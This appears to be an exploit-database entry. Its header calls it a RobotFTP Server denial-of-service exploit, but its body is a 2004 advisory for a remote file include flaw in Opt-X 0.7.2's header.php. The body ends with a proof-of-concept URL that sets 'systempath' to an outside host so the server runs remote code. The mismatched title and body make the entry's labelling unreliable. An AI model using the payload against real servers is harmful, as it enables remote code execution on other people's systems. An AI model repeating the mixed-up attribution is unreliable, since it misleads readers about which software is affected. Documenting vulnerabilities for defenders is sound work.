RobotFTP Server 1.0/2.0 - Remote Denial of Service

EDB-ID:

23750


Platform:

PHP

Published:

2004-02-24

source: https://www.securityfocus.com/bid/9732/info

It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module.

Opt-X version 0.7.2 has been reported to be prone to this issue.

http://www.example.com/path_of_optx/includes/header.php?systempath=http://www.example.com/